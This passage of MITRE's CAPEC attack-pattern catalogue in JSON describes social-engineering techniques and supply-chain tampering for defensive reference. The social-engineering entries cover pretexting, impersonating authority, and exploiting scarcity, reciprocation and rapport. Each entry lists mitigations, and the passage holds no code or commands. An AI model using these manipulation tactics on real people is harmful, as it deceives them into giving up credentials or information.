email.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"407","Exclude_Related":{"Exclude_ID":"513"}}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"414":{"ID":"414","Name":"Pretexting via Delivery Person","Abstraction":"Detailed","Status":"Draft","Description":"An adversary engages in pretexting behavior, assuming the role of a delivery person, to solicit information from target persons, or manipulate the target into performing an action that serves the adversary\'s interests. Impersonating a delivery person is an effective attack and an easy attack since not much acting is involved. Usually the hardest part is looking the part and having all of the proper credentials, papers and \\"deliveries\\" in order to be able to pull it off.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"407","Exclude_Related":{"Exclude_ID":"513"}}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"415":{"ID":"415","Name":"Pretexting via Phone","Abstraction":"Detailed","Status":"Draft","Description":"An adversary engages in pretexting behavior, assuming some sort of trusted role, and contacting the targeted individual or organization via phone to solicit information from target persons, or manipulate the target into performing an action that serves the adversary\'s interests. This is the most common social engineering attack. Some of the most commonly effective approaches are to impersonate a fellow employee, impersonate a computer technician or to target help desk personnel.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"407","Exclude_Related":{"Exclude_ID":"513"}}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"416":{"ID":"416","Name":"Manipulate Human Behavior","Abstraction":"Meta","Status":"Stable","Description":"An adversary exploits inherent human psychological predisposition to influence a targeted individual or group to solicit information or manipulate the target into performing an action that serves the adversary\'s interests. Many interpersonal social engineering techniques do not involve outright deception, although they can; many are subtle ways of manipulating a target to remove barriers, make the target feel comfortable, and produce an exchange in which the target is either more likely to share information directly, or let key information slip out unintentionally. A skilled adversary uses these techniques when appropriate to produce the desired outcome. Manipulation techniques vary from the overt, such as pretending to be a supervisor to a help desk, to the subtle, such as making the target feel comfortable with the adversary\'s speech and thought patterns.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attack patterns that manipulate human behavior can result in a wide variety of consequences and potentially affect the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent successful social engineering attacks."},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Methods_of_Attack, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Description Summary, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"}],"Previous_Entry_Name":["Target Influence via Social Engineering",{"Date":"2017-08-04"}]}},"417":{"ID":"417","Name":"Influence Perception","Abstraction":"Standard","Status":"Stable","Description":"The adversary uses social engineering to exploit the target\'s perception of the relationship between the adversary and themselves. This goal is to persuade the target to unknowingly perform an action or divulge information that is advantageous to the adversary.","Likelihood_Of_Attack":"High","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"416"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Resources_Required":{"Resource":"There are no necessary resources required for this attack."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks."},"References":{"Reference":[{"External_Reference_ID":"REF-348"},{"External_Reference_ID":"REF-360"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},"Previous_Entry_Name":["Target Influence via Perception of Reciprocation",{"Date":"2017-08-04"}]}},"418":{"ID":"418","Name":"Influence Perception of Reciprocation","Abstraction":"Detailed","Status":"Draft","Description":"An adversary uses a social engineering techniques to produce a sense of obligation in the target to perform a certain action or concede some sensitive or key piece of information. Obligation has to do with actions one feels they need to take due to some sort of social, legal, or moral requirement, duty, contract, or promise. There are various techniques for fostering a sense of obligation to reciprocate or concede during ordinary modes of communication. One method is to compliment the target, and follow up the compliment with a question. If performed correctly the target may volunteer a key piece of information, sometimes involuntarily.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"417"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks."},"Example_Instances":{"Example":"An adversary develops a relationship with the target to foster a feeling of obligation in them to perform a certain action or concede some information. A perception of obligation/concession means that the target feels they need to behave in some way or perform some sort of action due to being morally or legally bound to do so."},"References":{"Reference":[{"External_Reference_ID":"REF-348"},{"External_Reference_ID":"REF-360"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Methods_of_Attack, References, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},"Previous_Entry_Name":["Target Influence via Perception of Obligation",{"Date":"2017-08-04"}]}},"420":{"ID":"420","Name":"Influence Perception of Scarcity","Abstraction":"Detailed","Status":"Stable","Description":"The adversary leverages a perception of scarcity to persuade the target to perform an action or divulge information that is advantageous to the adversary. By conveying a perception of scarcity, or a situation of limited supply, the adversary aims to create a sense of urgency in the context of a target\'s decision-making process.","Likelihood_Of_Attack":"High","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"417"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks."},"Example_Instances":{"Example":"An adversary sends an email to a target about a limited-time opportunity to claim a considerable monetary reward. The email contains a link to a site which the adversary says is only active for a short time and to the first person to claim it. By convincing the user of the scarcity of the monetary reward, the adversary aims to persuade them to click on the malicious link in the email."},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Methods_of_Attack, References, Related_Attack_Patterns, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},"Previous_Entry_Name":["Target Influence via Perception of Scarcity",{"Date":"2017-08-04"}]}},"421":{"ID":"421","Name":"Influence Perception of Authority","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses a social engineering technique to convey a sense of authority that motivates the target to reveal specific information or take specific action. There are various techniques for producing a sense of authority during ordinary modes of communication. One common method is impersonation. By impersonating someone with a position of power within an organization, an adversary may motivate the target individual to reveal some piece of sensitive information or perform an action that benefits the adversary.","Likelihood_Of_Attack":"High","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"417"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks."},"Example_Instances":{"Example":"The adversary calls the target and announces that they are the head of IT at the target\'s company. The adversary goes on to say that there has been a technical issue and they need the target\'s login credentials for their account. By convincing the target of their authority, the adversary hopes the target will reveal the sensitive information."},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Methods_of_Attack, Related_Attack_Patterns, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"}],"Previous_Entry_Name":["Target Influence via Perception of Authority",{"Date":"2017-08-04"}]}},"422":{"ID":"422","Name":"Influence Perception of Commitment and Consistency","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses social engineering to convince the target to do minor tasks as opposed to larger actions. After complying with a request, individuals are more likely to agree to subsequent requests that are similar in type and required effort.","Likelihood_Of_Attack":"High","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"417"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":["An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.","Individuals should avoid complying with suspicious requests."]},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Related_Attack_Patterns, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}],"Previous_Entry_Name":["Target Influence via Perception of Commitment and Consistency",{"Date":"2017-08-04"}]}},"423":{"ID":"423","Name":"Influence Perception of Liking","Abstraction":"Detailed","Status":"Stable","Description":"The adversary influences the target\'s actions by building a relationship where the target has a liking to the adversary. People are more likely to be influenced by people of whom they are fond, so the adversary attempts to ingratiate themself with the target via actions, appearance, or a combination thereof.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"417"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the types of things that the target likes."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks."},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Related_Attack_Patterns, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"}],"Previous_Entry_Name":["Target Influence via Perception of Liking",{"Date":"2017-08-04"}]}},"424":{"ID":"424","Name":"Influence Perception of Consensus or Social Proof","Abstraction":"Detailed","Status":"Draft","Description":"The adversary influences the target\'s actions by leveraging the inherent human nature to assume behavior of others is appropriate. In situations of uncertainty, people tend to behave in ways they see others behaving. The adversary convinces the target of adopting behavior or actions that is advantageous to the adversary.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"417"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks."},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Related_Attack_Patterns, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},"Previous_Entry_Name":["Target Influence via Perception of Consensus or Social Proof",{"Date":"2017-08-04"}]}},"425":{"ID":"425","Name":"Target Influence via Framing","Abstraction":"Standard","Status":"Draft","Description":"An adversary uses framing techniques to contextualize a conversation so that the target is more likely to be influenced by the adversary\'s point of view. Framing is information and experiences in life that alter the way we react to decisions we must make. This type of persuasive technique exploits the way people are conditioned to perceive data and its significance, while avoiding negative or avoidance responses from the target. Rather than a specific technique framing is a methodology of conversation that slowly encourages the target to adopt to the adversary\'s perspective. One technique of framing is to avoid the use of the word \\"No\\" and to contextualize responses in a manner that is positive. When performed skillfully the target is much more likely to volunteer information or perform actions favorable to the adversary.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"416"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other","Note":"Successful attacks that influence the target via framing into performing an action or sharing sensitive information can result in a variety of consequences that negatively affect the confidentiality of an application or system."}},"Mitigations":{"Mitigation":["An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.","Avoid sharing unnecessary information during interactions beyond what is absolutely required for effective communication."]},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}]}},"426":{"ID":"426","Name":"Influence via Incentives","Abstraction":"Standard","Status":"Stable","Description":"The adversary incites a behavior from the target by manipulating something of influence. This is commonly associated with financial, social, or ideological incentivization. Examples include monetary fraud, peer pressure, and preying on the target\'s morals or ethics. The most effective incentive against one target might not be as effective against another, therefore the adversary must gather information about the target\'s vulnerability to particular incentives.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"416"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the incentives that would influence the actions of the specific target."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks."},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},"Previous_Entry_Name":["Target Influence via Manipulation of Incentives",{"Date":"2017-08-04"}]}},"427":{"ID":"427","Name":"Influence via Psychological Principles","Abstraction":"Standard","Status":"Draft","Description":"The adversary shapes the target\'s actions or behavior by focusing on the ways human interact and learn, leveraging such elements as cognitive and social psychology. In a variety of ways, a target can be influenced to behave or perform an action through capitalizing on what scholarship and research has learned about how and why humans react to specific scenarios and cues.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"416"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attacks that successfully influence the target into performing an action via psychological principles can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks."},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},"Previous_Entry_Name":["Target Influence via Psychological Principles",{"Date":"2017-08-04"}]}},"428":{"ID":"428","Name":"Influence via Modes of Thinking","Abstraction":"Detailed","Status":"Draft","Description":"The adversary tailors their communication to the language and thought patterns of the target thereby weakening barriers or reluctance to communication. This method is a way of building rapport with a target by matching their speech patterns and the primary ways or dominant senses with which they make abstractions. This technique can be used to make the target more receptive to sharing information because the adversary has adapted their communication forms to match those of the target. When skillfully employed, the target is likely to be unaware that they are being manipulated.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"427"}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Description Summary"},"Previous_Entry_Name":["Target Influence via Modes of Thinking",{"Date":"2017-08-04"}]}},"429":{"ID":"429","Name":"Target Influence via Eye Cues","Abstraction":"Detailed","Status":"Draft","Description":"The adversary gains information via non-verbal means from the target through eye movements.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"427"}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary"}}},"433":{"ID":"433","Name":"Target Influence via The Human Buffer Overflow","Abstraction":"Detailed","Status":"Draft","Description":"An attacker utilizes a technique to insinuate commands to the subconscious mind of the target via communication patterns. The human buffer overflow methodology does not rely on over-stimulating the mind of the target, but rather embedding messages within communication that the mind of the listener assembles at a subconscious level. The human buffer-overflow method is similar to subconscious programming to the extent that messages are embedded within the message. The fundamental difference is that embedded messages have a complete semantic quality, rather than mere imagery, and the mind of the target tends to key off of particular dominant patterns. The remaining information, carefully structured, speaks directly to the subconscious with a subtle, indirect, command. The effect is to produce a pattern of thinking that the attacker has predetermined but is buried within the message and not overtly stated. Structuring a human \\"buffer overflow\\" requires precise attention to detail and the use of information in a manner that distracts the conscious mind from the message the subconscious is receiving.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"427"}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"434":{"ID":"434","Name":"Target Influence via Interview and Interrogation","Abstraction":"Detailed","Status":"Draft","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"427"}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"435":{"ID":"435","Name":"Target Influence via Instant Rapport","Abstraction":"Detailed","Status":"Draft","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"427"}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"438":{"ID":"438","Name":"Modification During Manufacture","Abstraction":"Meta","Status":"Draft","Description":"An attacker modifies a technology, product, or component during a stage in its manufacture for the purpose of carrying out an attack against some entity involved in the supply chain lifecycle. There are an almost limitless number of ways an attacker can modify a technology when they are involved in its manufacture, as the attacker has potential inroads to the software composition, hardware design and assembly, firmware, or basic design mechanics. Additionally, manufacturing of key components is often outsourced with the final product assembled by the primary manufacturer. The greatest risk, however, is deliberate manipulation of design specifications to produce malicious hardware or devices. There are billions of transistors in a single integrated circuit and studies have shown that fewer than 10 transistors are required to create malicious functionality.","Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1195","Entry_Name":"Supply Chain Compromise"}},"References":{"Reference":[{"External_Reference_ID":"REF-379"},{"External_Reference_ID":"REF-380"},{"External_Reference_ID":"REF-381"},{"External_Reference_ID":"REF-382","Section":"Section 1. Introduction"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}],"Previous_Entry_Name":["Integrity Modification During Manufacture",{"Date":"2015-11-09"}]}},"439":{"ID":"439","Name":"Manipulation During Distribution","Abstraction":"Meta","Status":"Draft","Description":"An attacker undermines the integrity of a product, software, or technology at some stage of the distribution channel. The core threat of modification or manipulation during distribution arise from the many stages of distribution, as a product may traverse multiple suppliers and integrators as the final asset is delivered. Components and services provided from a manufacturer to a supplier may be tampered with during integration or packaging.","Example_Instances":{"Example":["A malicious OEM provider, or OEM provider employee or contractor, may install software, or modify existing code, during distribution.","External contractors involved in the packaging or testing of products or components may install software, or modify existing code, during distribution."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"1269"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1195","Entry_Name":"Supply Chain Compromise"}},"References":{"Reference":[{"External_Reference_ID":"REF-379"},{"External_Reference_ID":"REF-384"},{"External_Reference_ID":"REF-382","Section":"Section 1. Introduction"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}],"Previous_Entry_Name":["Integrity 